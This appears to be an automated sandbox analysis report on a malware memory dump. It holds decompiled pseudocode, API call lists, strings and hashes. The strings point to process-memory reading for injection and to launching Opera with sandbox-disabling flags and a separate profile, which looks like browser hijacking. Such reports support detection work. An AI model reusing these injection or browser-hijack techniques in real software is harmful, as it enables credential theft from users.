Part of subcall function 00C7797C: StrRChrW.SHLWAPI(?,?,?,00C63778), ref: 00C779BB
Part of subcall function 00C7797C: HeapAlloc.KERNEL32(?,?,?,00C63778), ref: 00C77A10
Part of subcall function 00C7797C: SetLastError.KERNEL32(?,?,?,00C63778), ref: 00C77A21

HeapFree.KERNEL32 ref: 00C63BEF
HeapFree.KERNEL32 ref: 00C63C14
SetLastError.KERNEL32 ref: 00C63C20

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Freelstrlen$AllocErrorLastlstrcat$lstrcpy
String ID:
API String ID: 895481724-0
Opcode ID: 50c6375ccdcfc14eb043f97f9d4a9d2fc6242a14cfb4b51806086a8a17dc2fd2
Instruction ID: 45cd3120825b4424a0af70fad9d4fe3c6ed1e67cea4fd8a0675db77e2b7e2174
Opcode Fuzzy Hash: 50c6375ccdcfc14eb043f97f9d4a9d2fc6242a14cfb4b51806086a8a17dc2fd2
Instruction Fuzzy Hash: DB517B66305BC486EA31CF96A884B6AB3A4FBC8FD0F488226DE5D47B15DF38C6459704

Uniqueness

Uniqueness Score: -1.00%

Function 00C825BC, Relevance: 15.1, APIs: 10, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00C825BC(void* __ebx, void* __ecx, signed long long __rax, long long __rbx, void* __rcx, signed long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16) {
				long long _v16;
				signed int _v24;
				void* __rdi;
				long _t31;
				long _t48;
				signed long long _t50;
				signed int _t51;
				void* _t53;
				void* _t62;
				signed long long _t66;
				signed long long _t67;
				void* _t69;
				void* _t73;
				void* _t75;

				_t75 = __r9;
				_t73 = __r8;
				_t67 = __rsi;
				_t50 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_t48 = 0;
				_t53 = __rcx;
				if( *((intOrPtr*)(__rcx + 0x1dc)) == 0) {
					__eflags =  *(__rcx + 0xb8) & 0x00001000;
					if(( *(__rcx + 0xb8) & 0x00001000) != 0) {
						L8:
						r9d = 0;
						r8d = 0;
						CreateEventA(??, ??, ??, ??);
						 *(_t53 + 0x208) = _t50;
						__eflags = _t50;
						if(_t50 != 0) {
							_t13 = _t53 + 0x1f8; // 0x1f8
							_t51 = _t13;
							_v16 = _t51;
							_v24 = _v24 & _t48;
							CreateThread(??, ??, ??, ??, ??, ??);
							 *((long long*)(_t53 + 0x200)) = _t51;
							__eflags = _t51;
							if(_t51 != 0) {
								WaitForSingleObject();
								CloseHandle(??);
								_t23 = _t53 + 0x208;
								 *_t23 =  *(_t53 + 0x208) & _t67;
								__eflags =  *_t23;
							} else {
								_t48 = GetLastError();
								CloseHandle(??);
								 *(_t53 + 0x208) =  *(_t53 + 0x208) & 0x00000000;
							}
							_t31 = _t48;
						} else {
							_t31 = GetLastError();
						}
						L14:
						return _t31;
					}
					InitializeCriticalSection();
					__eflags =  *(__rcx + 0xb8) & 0x00000010;
					if(( *(__rcx + 0xb8) & 0x00000010) != 0) {
						goto L8;
					}
					GetWindow();
					while(1) {
						GetWindow();
						_t66 = _t50;
						_t62 = _t53;
						__eflags = _t50;
						if(__eflags == 0) {
							break;
						}
						E00C81B4C(_t53, _t62, _t66, _t66, _t67, _t69, _t73, _t75);
					}
					E00C7C170(__eflags, _t50, _t53, _t62,  *((intOrPtr*)(_t53 + 0xe8)), _t67, _t69, _t73, _t75);
					goto L8;
				}
				_t31 = 0;
				goto L14;
			}

0x00c825bc
0x00c825bc
0x00c825bc
0x00c825bc
0x00c825bc
0x00c825c1
0x00c825cb
0x00c825cd
0x00c825d6
0x00c825df
0x00c825e9
0x00c8264a
0x00c8264a
0x00c8264d
0x00c82654
0x00c8265a
0x00c82661
0x00c82664
0x00c8266e
0x00c8266e
0x00c82678
0x00c82684
0x00c8268c
0x00c82692
0x00c82699
0x00c8269c
0x00c826c9
0x00c826d6
0x00c826dc
0x00c826dc
0x00c826dc
0x00c8269e
0x00c826ab
0x00c826ad
0x00c826b3
0x00c826b3
0x00c826e3
0x00c82666
0x00c82666
0x00c82666
0x00c826e5
0x00c826f4
0x00c826f4
0x00c825f2
0x00c825f8
0x00c825ff
0x00000000
0x00000000
0x00c8260d
0x00c8262d
0x00c8262d
0x00c82633
0x00c82636
0x00c82639
0x00c8263c
0x00000000
0x00000000
0x00c82620
0x00c8262a
0x00c82645
0x00000000
0x00c82645
0x00c825d8
0x00000000

APIs

InitializeCriticalSection.KERNEL32 ref: 00C825F2
GetWindow.USER32 ref: 00C8260D
GetWindow.USER32 ref: 00C8262D
CreateEventA.KERNEL32 ref: 00C82654
GetLastError.KERNEL32 ref: 00C82666

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$CreateCriticalErrorEventInitializeLastSection
String ID:
API String ID: 1676008072-0
Opcode ID: c2cf340048eff2efb7f4f9c81f0aba249f4bd5dc67e93ab25e1dc3816c3b71ea
Instruction ID: 5846b4ae339efdbb6604bf026e0efa5a142874adf91b42ea1e121bc01bfd95e0
Opcode Fuzzy Hash: c2cf340048eff2efb7f4f9c81f0aba249f4bd5dc67e93ab25e1dc3816c3b71ea
Instruction Fuzzy Hash: 7D317536604B4083FB54AF31E55876A3361E788F88F588635DE590B728EF38C8898718

Uniqueness

Uniqueness Score: -1.00%

Function 00C648E0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 112memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C6502C: ZwQueryInformationProcess.NTDLL(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C65079
Part of subcall function 00C6502C: ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C650CF
Part of subcall function 00C6502C: ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C650F5
Part of subcall function 00C6502C: ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C65141

VirtualAlloc.KERNEL32(00000000,?,LoadLibraryA,?,00000000,00C64783,?,?,?,?,00000000,?,?,00000000,00001644,00C64C46), ref: 00C6492F
VirtualFree.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C64A24

Part of subcall function 00C6502C: ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C651BA
Part of subcall function 00C6502C: StrRChrA.SHLWAPI(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C651F5

VirtualFree.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C6496D
VirtualAlloc.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C64981
lstrcmpiA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C649B8
StrChrA.SHLWAPI(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C649CA
lstrcmpiA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C649DE

Strings

LoadLibraryA, xrefs: 00C648F2

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$MemoryReadVirtual$AllocFreelstrcmpi$InformationQuery
String ID: LoadLibraryA
API String ID: 3835057325-1069661581
Opcode ID: 747faf28cbae03b8ef16c53ffebdc2f179a6b01932bca5d5da34c7b31e1f3cc6
Instruction ID: 660b5f7779c503dd48cdad009effb42254fffc6094bfd9a91c126e34c6dbbd91
Opcode Fuzzy Hash: 747faf28cbae03b8ef16c53ffebdc2f179a6b01932bca5d5da34c7b31e1f3cc6
Instruction Fuzzy Hash: 7831F232340B9092EB399F26E440B2BB795BB88F84F488424DE5957B04EF3CDA46D744

Uniqueness

Uniqueness Score: -1.00%

Function 00C81B4C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00C81B4C(long long __rbx, void* __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9) {
				void* _v8;
				intOrPtr _v36;
				void* _v68;
				char _v72;
				signed char _t30;
				void* _t44;
				void* _t45;
				void* _t50;
				long long* _t52;
				long long* _t53;
				long long _t74;
				void* _t77;
				void* _t81;
				void* _t85;
				struct HWND__* _t87;
				long long _t89;

				_t85 = __r9;
				_t53 = __rbx;
				_t50 = _t81;
				 *((long long*)(_t50 + 8)) = __rbx;
				 *((long long*)(_t50 + 0x10)) = __rbp;
				 *((long long*)(_t50 + 0x18)) = __rsi;
				 *((long long*)(_t50 + 0x20)) = __rdi;
				_t77 = __rcx;
				_t74 = __rdx;
				if(IsWindow(_t87) != 0) {
					L2:
					_t6 = _t77 + 0x88; // 0x88
					_t30 = E00C7BB64(_t50, _t53, _t6, _t74, _t85);
					if((_t30 & 0x00000004) != 0) {
						goto L9;
					} else {
						_t52 =  *((intOrPtr*)(_t77 + 0x1d0));
						_t49 = _t52;
						if(_t52 != 0) {
							while(1) {
								__eflags =  *_t52 - _t74;
								if( *_t52 == _t74) {
									goto L10;
								}
								_t89 = _t52;
								_t52 =  *((intOrPtr*)(_t52 + 0x38));
								__eflags = _t52;
								if(_t52 != 0) {
									continue;
								} else {
									_t13 = _t52 + 0x48; // 0xc6c2af
									_t44 = _t13;
									r8d = _t44;
									HeapAlloc(??, ??, ??);
									r8d = _t44;
									__eflags = 0;
									 *((long long*)(_t89 + 0x38)) = _t52;
									_t53 = _t52;
									memset(??, ??, ??);
									 *((long long*)(_t53 + 0x40)) = _t89;
									goto L8;
								}
								goto L10;
							}
						} else {
							_t45 = _t52 + 0x48;
							r8d = _t45;
							HeapAlloc(??, ??, ??);
							r8d = _t45;
							 *((long long*)(_t77 + 0x1d0)) = _t52;
							_t53 = _t52;
							memset(??, ??, ??);
							L8:
							_v72 = 0x3c;
							 *_t53 = _t74;
							GetWindowInfo(??, ??);
							 *((intOrPtr*)(_t53 + 0x14)) = E00C7BE8C( &_v72);
							r8d = 0x10;
							 *((intOrPtr*)(_t53 + 0x10)) = _v36;
							memcpy(??, ??, ??);
							_t30 = E00C81D90(_t49, _t52, _t53, _t77, _t53, _t77);
							goto L9;
						}
					}
				} else {
					_t5 = _t77 + 0x88; // 0x88
					_t30 = E00C7C050(_t50, __rbx, _t5, __rdx, __rcx);
					if(_t30 != 0) {
						goto L2;
					}
				}
				L10:
				return _t30;
			}

0x00c81b4c
0x00c81b4c
0x00c81b4c
0x00c81b4f
0x00c81b53
0x00c81b57
0x00c81b5b
0x00c81b65
0x00c81b68
0x00c81b78
0x00c81b91
0x00c81b91
0x00c81b9b
0x00c81ba2
0x00000000
0x00c81ba8
0x00c81ba8
0x00c81baf
0x00c81bb2
0x00c81be2
0x00c81be2
0x00c81be5
0x00000000
0x00000000
0x00c81beb
0x00c81bee
0x00c81bf2
0x00c81bf5
0x00000000
0x00c81bf7
0x00c81bfe
0x00c81bfe
0x00c81c01
0x00c81c06
0x00c81c0c
0x00c81c0f
0x00c81c14
0x00c81c18
0x00c81c1b
0x00c81c20
0x00000000
0x00c81c20
0x00000000
0x00c81bf5
0x00c81bb4
0x00c81bbb
0x00c81bbe
0x00c81bc3
0x00c81bc9
0x00c81bd1
0x00c81bd8
0x00c81bdb
0x00c81c24
0x00c81c24
0x00c81c34
0x00c81c37
0x00c81c47
0x00c81c57
0x00c81c5d
0x00c81c60
0x00c81c6b
0x00000000
0x00c81c6b
0x00c81bb2
0x00c81b7a
0x00c81b7a
0x00c81b84
0x00c81b8b
0x00000000
0x00000000
0x00c81b8b
0x00c81c73
0x00c81c8d

APIs

IsWindow.USER32 ref: 00C81B70
HeapAlloc.KERNEL32 ref: 00C81BC3
memset.NTDLL ref: 00C81BDB
HeapAlloc.KERNEL32 ref: 00C81C06
memset.NTDLL ref: 00C81C1B
GetWindowInfo.USER32 ref: 00C81C37
memcpy.NTDLL(?,?,?,?,?,?,?,?,00C82625), ref: 00C81C60

Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093

Strings

<, xrefs: 00C81C24

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$AllocHeapmemset$AncestorInfomemcpy
String ID: <
API String ID: 1110733298-4251816714
Opcode ID: f0e11183cc8415d312e310dd61a583f2b91275c778d87228157dc37baf906a94
Instruction ID: 96a257235cdfc59e4cebf6024d153e132565bc8e00158ff63915c9763fc08b8f
Opcode Fuzzy Hash: f0e11183cc8415d312e310dd61a583f2b91275c778d87228157dc37baf906a94
Instruction Fuzzy Hash: 38318D72300B4482EB24DF22E88076973A9F788FC4F498129DE5E83B14EF38C546C744

Uniqueness

Uniqueness Score: -1.00%

Function 00C76F88, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00C76F88(signed long long __rax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, char* __r8, long long __r14) {
				void* __rbp;
				void* _t21;
				signed long long _t33;
				char* _t45;
				void* _t46;
				char* _t51;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t57;
				char* _t58;
				void* _t60;

				_t58 = __r8;
				_t36 = __rcx;
				_t34 = __rbx;
				_t32 = __rax;
				_t55 = _t54 - 0x240;
				_t53 = _t55 + 0x30;
				 *((long long*)(_t53 + 0x220)) = __rbx;
				 *((long long*)(_t53 + 0x228)) = __rsi;
				_t4 = _t36 + 0x774; // 0x774
				_t51 = _t4;
				 *((long long*)(_t53 + 0x230)) = __rdi;
				 *((long long*)(_t53 + 0x238)) = __r14;
				r14d = 0;
				if(_t51 != 0) {
					lstrlenA();
					_t7 = _t32 + 1; // 0x1
					r8d = _t7;
					_t46 = __r8 + __r8;
					_t33 = _t46 + 0xf;
					if(_t33 <= _t46) {
						_t33 = 0xfffffff0;
					}
					_t32 = _t33 & 0xfffffff0;
					E00C6A4A0();
					_t57 = _t55 - (_t33 & 0xfffffff0);
					r9d = r9d | 0xffffffff;
					 *((intOrPtr*)(_t57 + 0x28)) = r8d;
					_t34 = _t57 + 0x30;
					_t58 = _t51;
					 *_t34 = r14w;
					 *((long long*)(_t57 + 0x20)) = _t34;
					MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				}
				lstrcpyW();
				lstrcatW(??, ??);
				r8d = 0;
				E00C770A8(_t32, _t34, L"APPDATA", _t51, _t53, _t58, _t53);
				_t21 = E00C6ADD8();
				_t60 = _t53;
				if(_t21 > 5) {
					r8d = 0;
					_t45 = L"LOCALAPPDATA";
				} else {
					_t58 = L"\\Local Settings\\Application Data";
					_t45 = L"USERPROFILE";
				}
				return E00C770A8(_t32, _t34, _t45, _t51, _t53, _t58, _t60);
			}

0x00c76f88
0x00c76f88
0x00c76f88
0x00c76f88
0x00c76f8a
0x00c76f91
0x00c76f96
0x00c76f9d
0x00c76fa4
0x00c76fa4
0x00c76fab
0x00c76fb5
0x00c76fbc
0x00c76fc2
0x00c76fc7
0x00c76fcd
0x00c76fcd
0x00c76fd5
0x00c76fd8
0x00c76fdf
0x00c76fe1
0x00c76fe1
0x00c76feb
0x00c76fef
0x00c76ff4
0x00c76ff7
0x00c76fff
0x00c77004
0x00c77009
0x00c7700c
0x00c77010
0x00c77015
0x00c7701b
0x00c77025
0x00c77036
0x00c77040
0x00c7704d
0x00c77052
0x00c77057
0x00c77061
0x00c77073
0x00c77076
0x00c77063
0x00c77063
0x00c7706a
0x00c7706a
0x00c770a6

APIs

lstrlenA.KERNEL32 ref: 00C76FC7
MultiByteToWideChar.KERNEL32 ref: 00C77015
lstrcpyW.KERNEL32 ref: 00C77025
lstrcatW.KERNEL32 ref: 00C77036

Strings

\Local Settings\Application Data, xrefs: 00C77063
LOCALAPPDATA, xrefs: 00C77076
APPDATA, xrefs: 00C77043
USERPROFILE, xrefs: 00C7706A

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWidelstrcatlstrcpylstrlen
String ID: APPDATA$LOCALAPPDATA$USERPROFILE$\Local Settings\Application Data
API String ID: 3312154097-664161059
Opcode ID: 96f297e64d1857451f2d378c609722e759ae5074f45e1fb9a645a81e4c19d71b
Instruction ID: df1438e690c77a70e0e54d55d2ba29b4fd73940a553af49d6d143e9404a8eabc
Opcode Fuzzy Hash: 96f297e64d1857451f2d378c609722e759ae5074f45e1fb9a645a81e4c19d71b
Instruction Fuzzy Hash: 72216232214AC5D5EB209F71E894BDC7365F744BA8F849312DA2D1BBA8DF38C24AC704

Uniqueness

Uniqueness Score: -1.00%

Function 00C77B88, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00C77A94,?,?,?,00C63778), ref: 00C77BD2
HeapAlloc.KERNEL32(?,?,?,00C77A94,?,?,?,00C63778), ref: 00C77BF2
SetLastError.KERNEL32(?,?,?,00C77A94,?,?,?,00C63778), ref: 00C77C03
wsprintfW.USER32 ref: 00C77C1A
lstrcmpW.KERNEL32(?,?,?,00C77A94,?,?,?,00C63778), ref: 00C77C2A
lstrcatW.KERNEL32 ref: 00C77C3E
lstrcatW.KERNEL32 ref: 00C77C4A

Strings

Default, xrefs: 00C77C20

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$AllocErrorHeapLastlstrcmplstrlenwsprintf
String ID: Default
API String ID: 4106241528-753088835
Opcode ID: 5bd8e09f24005a7f32539fcb6662382b5387aa8da5e45f42ee9a872fe66d91bd
Instruction ID: 37479abff7977a37fa264c3cf27c17f1a8c3c0549f6c8be0659f5f644f90859a
Opcode Fuzzy Hash: 5bd8e09f24005a7f32539fcb6662382b5387aa8da5e45f42ee9a872fe66d91bd
Instruction Fuzzy Hash: 61117F74304B8581FA148B12F9447696361EB8CFD0F98C2219E1A47B24EF3DC589C704

Uniqueness

Uniqueness Score: -1.00%

Function 00C77AB4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 53stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77AFA
HeapAlloc.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B17
SetLastError.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B28
lstrcpyA.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B38
lstrcmpA.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B48
lstrcatA.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B5C
lstrcatA.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B68

Strings

Default, xrefs: 00C77B3E

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$AllocErrorHeapLastlstrcmplstrcpylstrlen
String ID: Default
API String ID: 4072419705-753088835
Opcode ID: 96f9a34feb047c6e22b2438f2389fafb14d51e5903c64fe0ef7d08b07b2aebc5
Instruction ID: d34d280b828a67834171f9e725521300ef3aeda9a4db5a187c57fc8bfe8e2fa1
Opcode Fuzzy Hash: 96f9a34feb047c6e22b2438f2389fafb14d51e5903c64fe0ef7d08b07b2aebc5
Instruction Fuzzy Hash: 90118264705B4186FE249F12F8487597361FB88FC4F98D2319E1A47B24DF3DD54A8748

Uniqueness

Uniqueness Score: -1.00%

Function 00C76E84, Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 34COMMON

Download Yara Rule

APIs

PathRemoveBlanksW.SHLWAPI ref: 00C76EB0
PathRemoveArgsW.SHLWAPI ref: 00C76EB9

Strings

opera.exe, xrefs: 00C76EF4
--no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11, xrefs: 00C76EC4
Opera Software\Opera Stable, xrefs: 00C76ED0
APPDATA, xrefs: 00C76EE6
OPRN, xrefs: 00C76EED
--user-data-dir=, xrefs: 00C76ED7

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: PathRemove$ArgsBlanks
String ID: --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11$ --user-data-dir=$APPDATA$OPRN$Opera Software\Opera Stable$opera.exe
API String ID: 3367427818-3321430093
Opcode ID: 8340036eebc8043cb3e93b9764cd0e7b4c2e1756ea22cf72bdda6750658ba07b
Instruction ID: e7676657cd85d50030d494e097bf596b8422a28b001f10bb2c9522b2a3728581
Opcode Fuzzy Hash: 8340036eebc8043cb3e93b9764cd0e7b4c2e1756ea22cf72bdda6750658ba07b
Instruction Fuzzy Hash: C9012871208B8591FB108B11F9417AA73A4F788BD0F448222EA8D03B38EF3CC55AC705

Uniqueness

Uniqueness Score: -1.00%

Function 00C676F8, Relevance: 13.6, APIs: 9, Instructions: 104synchronizationCOMMON

Download Yara Rule

APIs

WindowFromDC.USER32 ref: 00C67723
WaitForSingleObject.KERNEL32 ref: 00C6774C
CreateRectRgn.GDI32 ref: 00C6775F
GetClipRgn.GDI32 ref: 00C6776E
SelectClipRgn.GDI32 ref: 00C67780
DeleteObject.GDI32 ref: 00C67789
GetViewportOrgEx.GDI32 ref: 00C67797
SetViewportOrgEx.GDI32 ref: 00C677AD
ReleaseMutex.KERNEL32 ref: 00C67827

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
String ID:
API String ID: 3315380975-0
Opcode ID: 430227cecb4a553035d76738b229a9d24f85a849dccca27406bd5df1c023f19c
Instruction ID: d61ce8f37521393226cb92ea2fb194392424d9e7b99b6ba73f2f16969ede7a98
Opcode Fuzzy Hash: 430227cecb4a553035d76738b229a9d24f85a849dccca27406bd5df1c023f19c
Instruction Fuzzy Hash: 8441C936609B808BE760CF16E484B4EB7A1F788B90F508625EE9D93B68DF38D445CF04

Uniqueness

Uniqueness Score: -1.00%

Function 00C678C0, Relevance: 13.6, APIs: 9, Instructions: 94synchronizationCOMMON

Download Yara Rule

APIs

WindowFromDC.USER32 ref: 00C678EB
WaitForSingleObject.KERNEL32 ref: 00C67914
CreateRectRgn.GDI32 ref: 00C6792D
GetClipRgn.GDI32 ref: 00C6793C
SelectClipRgn.GDI32 ref: 00C6794E
DeleteObject.GDI32 ref: 00C67957
GetViewportOrgEx.GDI32 ref: 00C67965
SetViewportOrgEx.GDI32 ref: 00C6797B
ReleaseMutex.KERNEL32 ref: 00C679D2

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
String ID:
API String ID: 3315380975-0
Opcode ID: c3b1197280408dd03c6e12fe0c3f1574ab34dc0aff50c3c921cebb3180cc4384
Instruction ID: 8bbe6b4014ab732277007fa4a8b87dda170769956935a96a579c108eba53e941
Opcode Fuzzy Hash: c3b1197280408dd03c6e12fe0c3f1574ab34dc0aff50c3c921cebb3180cc4384
Instruction Fuzzy Hash: 75412F76704B808BE760CF16E844B5AB7A1F789B90F548625EE9943B14DF3CC449CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C7EEB8, Relevance: 13.6, APIs: 9, Instructions: 91windowCOMMON

Download Yara Rule

APIs

GetSystemPaletteEntries.GDI32 ref: 00C7EEE5
CreateCompatibleDC.GDI32 ref: 00C7EF7B
SelectObject.GDI32 ref: 00C7EF93
DeleteDC.GDI32 ref: 00C7EFA4
SetDIBColorTable.GDI32 ref: 00C7EFB9
SelectObject.GDI32 ref: 00C7EFC5
DeleteObject.GDI32 ref: 00C7EFD3
DeleteObject.GDI32 ref: 00C7EFDE
DeleteDC.GDI32 ref: 00C7EFE7

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeleteObject$Select$ColorCompatibleCreateEntriesPaletteSystemTable
String ID:
API String ID: 4035217877-0
Opcode ID: b087146f7122ed4dc4975e12b7782f83ce4ff62c8d1374c68657605817ed5213
Instruction ID: f36776e833cc056d8ea4d15f097d768b03117d05af74f1cb412121fa2238f0ba
Opcode Fuzzy Hash: b087146f7122ed4dc4975e12b7782f83ce4ff62c8d1374c68657605817ed5213
Instruction Fuzzy Hash: 9431C3223196C088EB21CB65A4147996760E76EF88F98C265D98E43F55DE2DC10ECB14

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F550, Relevance: 13.6, APIs: 9, Instructions: 82stringmemoryCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32 ref: 00C7F57E
HeapAlloc.KERNEL32 ref: 00C7F5A3
